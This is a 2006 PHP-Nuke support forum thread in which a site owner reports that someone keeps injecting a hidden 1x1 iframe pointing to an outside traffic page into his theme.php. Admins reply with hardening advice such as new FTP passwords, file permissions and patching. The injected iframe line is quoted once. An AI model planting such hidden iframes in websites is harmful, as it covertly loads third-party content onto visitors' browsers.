| Author |
Message |
synaptyx
Hangin' Around
Joined: Jul 20, 2006
Posts: 41
|
 Posted:
Fri Aug 04, 2006 5:39 am |
|
Someone keeps hacking my theme.php and adding this line in various places.Code:<iframe src='http://comrost.com/traffic/index.php' width=1 height=1></iframe>
|
Any ideas what this is, and how to stop it from recurring.
The latest NukeSentinel isn't stopping it.
Thanks |
| |
|
|
|
jakec
Site Admin
Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom
|
| Posted:
Fri Aug 04, 2006 6:00 am |
|
What version of Nuke are you using?
Do you have any 3rd party modules? |
Last edited by jakec on Fri Aug 04, 2006 6:21 am; edited 1 time in total |
|
|
|
|
manunkind
Client
Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM
|
| Posted:
Fri Aug 04, 2006 6:15 am |
|
Is it possible they are doing it through FTP? NukeSentinel won't stop that.
Change your FTP password and see if it stops. |
_________________
Only registered users can see links on this board! Get registered or login! |
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
|
| Posted:
Fri Aug 04, 2006 6:50 am |
|
If you have no third porty modules or forum hacks that do not allow file uploading, this is worrying.
Make sure your theme.php is CHMOD no higher than 644 |
| |
|
|
|
Guardian2003
|
| Posted:
Fri Aug 04, 2006 6:51 am |
|
A link to your site would be useful too! |
| |
|
|
|
|
synaptyx
|
| Posted:
Fri Aug 04, 2006 7:34 am |
|
Hi, using nuke 7.7patched and the latest nukesentinel. There are a few third party modules. Site is at: http://poee.co.uk I'm not using phpbb at all, but have a seperate install of smf. |
| |
|
|
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6437
|
| Posted:
Fri Aug 04, 2006 7:47 am |
|
7.7 REMOVES the security for bad HTML (including iframes) and there's no way NukeSentinel can block that. Don't allow guests to submit news, comments, etc. That would help give you some idea of WHO is attacking.
Also, make sure you put admin authentication on both the admin.php and modules/Forums/admin directory.
Not sure if SMF is secure, but it probably doesn't use standard PHP-Nuke database access methods, which again, NukeSentinel cannot protect.
And follow Guardian's suggestions above. |
_________________
I search, therefore I exist...
Only registered users can see links on this board! Get registered or login! |
|
|
|
|
synaptyx
|
| Posted:
Fri Aug 04, 2006 8:55 am |
|
| kguske wrote: | | Also, make sure you put admin authentication on both the admin.php and modules/Forums/admin directory. |
Thanks for that. 
I've implemented the other suggestions, but not sure how I go about this. |
| |
|
|
|
|
kguske
|
| Posted:
Fri Aug 04, 2006 11:50 am |
|
NukeSentinel has instructions for doing this on the admin.php file. You'll need to do it manually for the modules/Forums/admin directory.
Note that this applies to all versions / distributions of Nuke whether or not you have NukeSentinel installed. |
| |
|
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
| Posted:
Sat Aug 05, 2006 7:58 am |
|
Also make sure your site is patched to the latest 3.2b patches from http://nukeresources.com. You are "playing with fire" using 7.7. |
_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! |
|
|
|
|
synaptyx
|
| Posted:
Mon Aug 07, 2006 3:49 am |
|
| montego wrote: | | You are "playing with fire" using 7.7. |
Taken on board and just migrated to RavenNuke76.  |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
